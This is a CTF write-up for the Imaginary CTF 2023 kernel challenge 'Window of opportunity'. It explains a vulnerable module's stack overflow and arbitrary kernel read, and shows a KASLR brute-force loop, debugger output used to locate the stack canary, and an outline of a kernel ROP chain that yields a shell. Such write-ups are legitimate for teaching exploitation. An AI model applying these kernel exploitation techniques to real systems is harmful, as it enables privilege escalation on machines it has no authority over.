Window of opportunity: Linux kernel pwnable - Imaginary CTF 2023

This writeup was originally posted on my github. You can find more of my kernel ctf exploits here.

Protections: SMEP, SMAP, KASLR, KPTI
Kernel vers: 5.19.0-43-generic x86_64 GNU/Linux

The kernel module registers a character device at /dev/window and implements four file operations device_open, device_release, device_write, and device_ioctl.

Among them device_write and device_ioctl looks sus, lets take a look at it. In device_write function the size parameter is not validated, it can be used to overflow the stack and write a ROP chain. But there is a canary which prevents us from overflowing it.

ssize_t __fastcall device_write(file *file, const char *buf, size_t size, loff_t *offset)
char a[64]; // [rsp+0h] [rbp-50h] BYREF
copy_from_user(a, buf, size);
return 0LL;

The other function device_ioctl gets a request object from user which holds a pointer and a message. The request object is copied to a stack buffer safely using copy_from_user then it uses the ptr member of request struct as src operand in copy_to_function

__copy_to_user — Copy a block of data into user space, with less checking. Returns number of bytes that could not be copied. On success, this will be zero.

typedef struct {
unsigned long* ptr;
char msg[256];
} request;
__int64 __fastcall device_ioctl(file *filp, __int64 cmd, unsigned __int64 arg)
request req; // [rsp+0h] [rbp-120h] BYREF
if ( (_DWORD)cmd == 0x1337 )
v5 = v4;
copy_from_user(&req, v4, 0x108LL);
result = (int)copy_to_user(v5 + 8, req.ptr, 0x100LL);
return result;

We’ve got Arbitrary read but what can we read, KASLR is enabled so we don’t even know any valid address, or so I thought for two reasons: One copy_to_user would not panic if passed an invalid src address. So I quickly found a unique string "68F2D50B-C469-4d8A-BD3D-941A103FD3FC" from the kernel image and bruteforced the address until device_ioctl returned the string.

unsigned long uuid_offset = 0x22c1e00;
for (kaslr = 0xffffffff00000000; kaslr < 0xfffffffffff00000; kaslr += 0x100000) {
req->ptr = kaslr + uuid_offset;
ioctl(fd, 0x1337, req);
if (!strncmp("68F2D50B-C469-4d8A-BD3D-941A103FD3FC", req->msg, sizeof("68F2D50B-C469-4d8A-BD3D-941A103FD3FC"))) {

And the second reason is, someone in Discord mentioned Kernel text can be leaked by reading the Interrupt Descriptor Table (IDT) which isn’t affected by kaslr.

[12:46 AM]nasm: And for the fixed address it’s a pointer toward kernel .text around the IDT, given IDT isn’t affected by kaslr (hxp used the same trick recently in one of their challenge

Awesome! Now that we have text address we can ROP?? No, we still have to find the canary of device_write function. So, the first thing I did was setting a break point at device_write and grab the actual canary. Then used the search feature in pwndbg to find the occurence of canary in memory.

pwndbg> search -8 0xf13c6e5c78a13700
Searching for value: b'\x007\xa1x\\n<\xf1'
<pt> 0xffff888005a75750 0xf13c6e5c78a13700
<pt> 0xffff888005a759d8 0xf13c6e5c78a13700
<pt> 0xffff888005a75c38 0xf13c6e5c78a13700
<pt> 0xffff888005a75e30 0xf13c6e5c78a13700
<pt> 0xffff888005a75e88 0xf13c6e5c78a13700
<pt> 0xffff888005aba208 0xf13c6e5c78a13700
<pt> 0xffff88800f400028 0xf13c6e5c78a13700
<pt> 0xffff88800f405ce0 0xf13c6e5c78a13700
<pt> 0xffff88800f405dc0 0xf13c6e5c78a13700
<pt> 0xffffc90000003ce0 0xf13c6e5c78a13700
<pt> 0xffffc90000003dc0 0xf13c6e5c78a13700
<pt> 0xffffc90000653750 0xf13c6e5c78a13700
<pt> 0xffffc900006539d8 0xf13c6e5c78a13700
<pt> 0xffffc90000653c38 0xf13c6e5c78a13700
<pt> 0xffffc90000653e30 0xf13c6e5c78a13700
<pt> 0xffffc90000653e88 0xf13c6e5c78a13700

Address starting with 0xffffc9.. are stack address or somthing which as far as I know aren’t leakable. Now we need to find a pointer in kernel bss which is in the same mapping as the above canary pointers.

This is where I wasted lots of hours calculating wrong offsets

Soon I found these pointers in bss which is in the same mapping as canary pointer.

pwndbg> tele 0xffffffff83003c80
00:00000xffffffff83003c80 —▸ 0xffff88800f431380 ◂— 0x100000
01:00080xffffffff83003c88 —▸ 0xffff8880042d8080 ◂— 0x100000

I used the pointer at 0xffffffff83003c80 to leak the <canary_ptr + offset>. Again use the Arbitrary address read to leak the canary. And then a straight kROP using device_write to get a shell.

Post Exploitation

[12:44 AM]nasm: But with an initramfs the whole fs is directly mapped into the physmap

Apparantely, the initramfs archive is loaded into kernel memory at the start. So we could have just searched for ictf{ string at somewhere near kernel_text + 0x2c3b000 to get the flag.

A simple flag search in gdb would have shown the flag location, instead of wasting ~6 hrs looking at hex numbers.

